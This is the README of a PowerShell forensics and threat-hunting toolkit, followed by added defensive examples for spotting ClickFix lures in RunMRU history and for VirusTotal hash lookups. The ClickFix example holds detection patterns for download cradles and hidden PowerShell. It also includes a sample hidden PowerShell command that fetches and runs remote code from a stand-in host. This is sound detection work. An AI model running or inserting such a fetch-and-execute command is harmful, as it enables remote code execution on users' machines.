Repository record (ecosyste.ms): blwhit/ThreatHunter, https://github.com/blwhit/ThreatHunter
Description: Advanced PowerShell DFIR module for forensic analysis, threat hunting, and cmdline investigation in Windows.
Language: PowerShell. License: none declared. Homepage: https://blakekwhite.com. Created 2025-09-04, last pushed 2026-01-11. Previous names: blwhit/ps-dfir-hunter, blwhit/ps-dfir-threathunter.
Topics: cybersecurity, dfir, digital-forensics, evtx-analysis, forensic-analysis, forensics, incident-response, malware-detection, powershell, security, threat-hunting, virustotal, windows

<img width="2000" height="1000" alt="threathunter" src="https://github.com/user-attachments/assets/3af47e17-aad3-4c6d-b89d-c3ac3a4d543d" />

## Overview

ThreatHunter is a PowerShell toolkit for threat hunting, digital forensics, and incident response (DFIR).

It provides a suite of `Hunt-*` functions to detect persistence mechanisms, analyze system artifacts, search event logs, and generate forensic reports, all from the PowerShell command line.

**[Read the Wiki](../../wiki)**

---

## 🎯 Core Capabilities

| Function | Purpose |
|----------|---------|
| **Hunt-ForensicDump** | Forensic collection with interactive HTML reporting |
| **Hunt-Persistence** | Detect 60+ persistence techniques (registry, services, WMI, tasks) |
| **Hunt-Logs** | Event log analysis with caching and IOC detection |
| **Hunt-Browser** | Browser history/extension analysis with tool integration |
| **Hunt-Files** | File hunting by time, content, hashes, and alternate data streams (ADS) |
| **Hunt-Registry** | Registry search, autoruns, and RunMRU (ClickFix detection) |
| **Hunt-Services** | Service enumeration with svchost DLL resolution |
| **Hunt-Tasks** | Scheduled task analysis with privilege detection |
| **Hunt-VirusTotal** | VirusTotal API integration with auto-upload |

---

## 🔧 Installation

### Option 1: Install the Module from PS Gallery
```powershell
Install-Module ThreatHunter -Force -AllowClobber

Import-Module ThreatHunter
```

`-AllowClobber` lets the install proceed even when another module already exports a command of the same name.

#### Install Module for Temporary Usage
```powershell
Install-Module ThreatHunter -Scope CurrentUser

Import-Module ThreatHunter

# When Done
Uninstall-Module ThreatHunter
```

### Option 2: Install from Git
```powershell
git clone https://github.com/blwhit/ThreatHunter.git

cd .\ThreatHunter\

Import-Module .\ThreatHunter.psd1
```

### Option 3: Install from Web Request
```powershell
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/blwhit/ThreatHunter/refs/heads/main/ThreatHunter.psm1" -OutFile "ThreatHunter.psm1"

Import-Module ".\ThreatHunter.psm1"
```

This fetches whatever is on `main` at that moment, unpinned and unsigned. On an engagement host, prefer a copy you have already hashed and reviewed, or pin the URL to a specific commit and compare `Get-FileHash` against a value you recorded beforehand.

### Troubleshooting Errors:

#### [Problem] Execution Policy is Blocking Module
```
Import-Module : File 'ThreatHunter.psm1' cannot be loaded because running scripts is disabled on this system.
```

#### [Fix] Temporarily set execution policy for the current PowerShell session.
```powershell
Set-ExecutionPolicy Unrestricted -Scope Process
```

`-Scope Process` affects only the current session and needs no administrator rights. Note that a `.psm1` downloaded with `Invoke-WebRequest` carries the Mark-of-the-Web (`Zone.Identifier` stream), so `Unrestricted` will still prompt before loading it; `Unblock-File .\ThreatHunter.psm1` clears that flag once you have verified the file.

---

## 🚀 Quick Examples
```powershell

# Quick forensic dump and export EVTX logs to ZIP
Hunt-ForensicDump -StartDate "3D" -LoadBrowserTool -SkipConfirmation -ExportLogs

# Hunt for persistence
Hunt-Persistence -Aggressive

# Search all event logs for IOCs
Hunt-Logs -StartDate "7D" -Search "mimikatz"

# Pull all browser history
Hunt-Browser -LoadTool -SkipConfirmation
```

---

## 📋 Requirements

- PowerShell 5.0+
- Windows 7/Server 2008 R2 or later
- Administrator privileges (recommended; several artifact sources, such as other users' hives and some event logs, are unreadable without them)

---

## ⚡ Key Features

- **Pure PowerShell** - No compiled binaries or external dependencies
- **Interactive HTML Reports** - Single-file forensic reports with dark/light themes
- **Smart Caching** - Browser and log caching for fast repeated searches
- **Multiple Outputs** - Console, CSV, PowerShell objects
- **Date Filtering** - Flexible relative (e.g. `"3D"`, `"7D"`) and absolute date formats
- **MITRE ATT&CK** - Persistence techniques mapped to the framework
- **ClickFix Detection** - Analyze Win+R commands (RunMRU) for social engineering attacks
- **Offline Analysis** - Process exported EVTX logs and CSV files

---

## 📚 Documentation

- **[Home](../../wiki/Home)** - Module overview and quick start
- **[Hunt-ForensicDump](../../wiki/Hunt-ForensicDump)** - Master forensic collection
- **[Hunt-Persistence](../../wiki/Hunt-Persistence)** - 60+ persistence techniques
- **[Hunt-Logs](../../wiki/Hunt-Logs)** - Event log hunting
- **[Hunt-Browser](../../wiki/Hunt-Browser)** - Browser analysis
- **[Hunt-Files](../../wiki/Hunt-Files)** - File system hunting
- **[Hunt-Registry](../../wiki/Hunt-Registry)** - Registry analysis
- **[Hunt-Services](../../wiki/Hunt-Services)** - Service enumeration
- **[Hunt-Tasks](../../wiki/Hunt-Tasks)** - Scheduled task analysis
- **[Hunt-VirusTotal](../../wiki/Hunt-VirusTotal)** - VirusTotal integration

---

## 🛡️ Use Cases

- **Incident Response** - Quick triage and comprehensive data collection
- **Threat Hunting** - Proactive search for persistence and IOCs
- **Forensic Analysis** - Detailed system artifact examination

---

## 🔗 Resources

- **PowerShell Gallery**: https://www.powershellgallery.com/packages/ThreatHunter/1.0
- **Wiki Documentation**: [View the Wiki](../../wiki)
- **MITRE ATT&CK**: https://attack.mitre.org
- **Issue Tracker**: [Submit an Issue](../../issues)

---

**Author**: [Blake White](https://blakekwhite.com)  
**Version**: 1.0  
**Last Updated**: Jan 2026
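The ClickFix detection mentioned under Key Features and Hunt-Registry works from the Explorer `RunMRU` key, where Windows records what was typed into the Win+R box. The following is an added example written for this page, not ThreatHunter's own code: it reads that key (or a constructed hashtable standing in for it), restores the recency order from `MRUList`, and flags entries that look like a pasted ClickFix lure. The function names, regex heuristics, and the sample entries are mine.

```powershell
# Added example (not part of ThreatHunter). Win+R history lives at
# HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# values a, b, c, ... hold "<typed command>\1" and MRUList holds the value
# letters in most-recent-first order.

function Get-RunMruEntries {
    [CmdletBinding()]
    param(
        # Use HKU:\<SID>\Software\...\RunMRU (or a loaded hive) for other users.
        [string]$KeyPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU',
        # Offline/test input shaped like the key's values (constructed, see below).
        [hashtable]$Values
    )
    if (-not $Values) {
        if (-not (Test-Path $KeyPath)) { return @() }
        $item   = Get-ItemProperty -Path $KeyPath
        $Values = @{}
        foreach ($p in $item.PSObject.Properties) {
            if ($p.Name -notmatch '^PS') { $Values[$p.Name] = $p.Value }   # drop PSPath etc.
        }
    }
    $order = [string]$Values['MRUList']
    foreach ($letter in $order.ToCharArray()) {
        $raw = [string]$Values["$letter"]
        if (-not $raw) { continue }
        [pscustomobject]@{
            Slot    = [string]$letter
            Command = ($raw -replace '\\1$', '')   # strip the trailing "\1"
        }
    }
}

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$Command)
    # Heuristics (mine, tune to taste): LOLBins launched straight from the Run
    # box, hidden/encoded PowerShell, download-and-execute one-liners, and the
    # "I am not a robot" comment that ClickFix lures append so the visible end
    # of the pasted line looks harmless in the Run dialog.
    $patterns = [ordered]@{
        'hidden-or-encoded-powershell' = '(?i)powershell.*(-w(indowstyle)?\s+h(idden)?|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,})'
        'download-cradle'              = '(?i)(iwr|invoke-webrequest|curl|wget|irm|invoke-restmethod|downloadstring|Net\.WebClient).*(\||iex|invoke-expression)'
        'mshta-remote'                 = '(?i)mshta(\.exe)?\s+(https?|\\\\)'
        'lolbin-from-run-box'          = '(?i)^(cmd|powershell|pwsh|mshta|rundll32|regsvr32|certutil|bitsadmin|wscript|cscript|msiexec)(\.exe)?\s'
        'captcha-comment-padding'      = '(?i)#\s*"?\s*(I am not a robot|verif(y|ication)|captcha|cloudflare)'
    }
    $hits = foreach ($name in $patterns.Keys) {
        if ($Command -match $patterns[$name]) { $name }
    }
    [pscustomobject]@{
        Command    = $Command
        Suspicious = [bool]$hits
        Reasons    = @($hits)
    }
}

# Constructed sample resembling a RunMRU after a ClickFix lure (not from a real case).
$sample = @{
    MRUList = 'cba'
    a       = 'notepad\1'
    b       = 'mstsc\1'
    c       = 'powershell -w hidden -c "iwr https://example.invalid/x.txt | iex" # I am not a robot - reCAPTCHA Verification ID: 3847\1'
}

# Live host: drop -Values to read the current user's key instead.
Get-RunMruEntries -Values $sample |
    ForEach-Object { Test-ClickFixCommand -Command $_.Command } |
    Where-Object Suspicious |
    Format-Table -AutoSize Command, Reasons
```

Only the `c` entry is reported, with all five reasons. RunMRU is per user and is written by Explorer, so for a suspected victim account you need that user's `HKU` hive (load `NTUSER.DAT` with `reg load` if they are not logged on); a command typed into an already-open console never lands here.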
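The Hunt-VirusTotal entry in the capabilities table advertises auto-upload. A submitted file becomes visible to every other VirusTotal user, including an attacker watching for their own sample, so a hash lookup first and an explicit opt-in for upload is the safer shape. The following is an added example against the public VirusTotal v3 API, not the project's `Hunt-VirusTotal`; it assumes an API key in `$env:VT_API_KEY` and network access, and the function names are mine.

```powershell
# Added example (not ThreatHunter's Hunt-VirusTotal). Hash-first lookups, with
# upload gated behind -AllowUpload so nothing leaves the host by default.

function Get-VtFileVerdict {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$ApiKey = $env:VT_API_KEY   # assumption: key supplied via environment
    )
    if (-not $ApiKey) { throw 'Set $env:VT_API_KEY first.' }
    $sha256  = (Get-FileHash -Algorithm SHA256 -Path $Path).Hash.ToLower()
    $headers = @{ 'x-apikey' = $ApiKey }
    try {
        $r = Invoke-RestMethod -Method Get -Headers $headers `
                 -Uri "https://www.virustotal.com/api/v3/files/$sha256"
        $stats = $r.data.attributes.last_analysis_stats
        [pscustomobject]@{
            Path = $Path; Sha256 = $sha256; Known = $true
            Malicious = $stats.malicious; Suspicious = $stats.suspicious
            Undetected = $stats.undetected
            Link = "https://www.virustotal.com/gui/file/$sha256"
        }
    } catch {
        # 404 means VT has never seen this hash; anything else is a real failure.
        $status = $_.Exception.Response.StatusCode.value__
        if ($status -ne 404) { throw }
        [pscustomobject]@{
            Path = $Path; Sha256 = $sha256; Known = $false
            Malicious = $null; Suspicious = $null; Undetected = $null; Link = $null
        }
    }
}

function Submit-VtFile {
    # Opt-in by design: never auto-upload documents, credential material, or
    # bespoke internal tooling. The /files endpoint takes files up to 32 MB.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [switch]$AllowUpload,
        [string]$ApiKey = $env:VT_API_KEY
    )
    if (-not $AllowUpload) { throw "Refusing to upload $Path without -AllowUpload." }
    if (-not $ApiKey)      { throw 'Set $env:VT_API_KEY first.' }
    Add-Type -AssemblyName System.Net.Http     # needed on Windows PowerShell 5.x
    $client = [System.Net.Http.HttpClient]::new()
    $client.DefaultRequestHeaders.Add('x-apikey', $ApiKey)
    $form  = [System.Net.Http.MultipartFormDataContent]::new()
    $bytes = [System.IO.File]::ReadAllBytes((Resolve-Path $Path).Path)
    $form.Add([System.Net.Http.ByteArrayContent]::new($bytes), 'file', (Split-Path -Leaf $Path))
    $resp = $client.PostAsync('https://www.virustotal.com/api/v3/files', $form).GetAwaiter().GetResult()
    $body = $resp.Content.ReadAsStringAsync().GetAwaiter().GetResult()
    if (-not $resp.IsSuccessStatusCode) { throw "VT upload failed: $($resp.StatusCode) $body" }
    ($body | ConvertFrom-Json).data.id       # analysis id; poll /api/v3/analyses/<id>
}

# Triage a drop folder: look everything up by hash, never upload unless asked.
# Public API keys are limited to 4 requests a minute; throttle large batches.
Get-ChildItem 'C:\Users\Public\Downloads' -File |
    ForEach-Object { Start-Sleep -Seconds 15; Get-VtFileVerdict -Path $_.FullName } |
    Format-Table -AutoSize Known, Malicious, Sha256, Path
```

Unknown hashes (`Known = $false`) are the interesting ones on a compromised host: a file nobody has ever submitted is either benign local data or a bespoke payload, and the decision to reveal it to VirusTotal belongs to the case lead, not to a default switch.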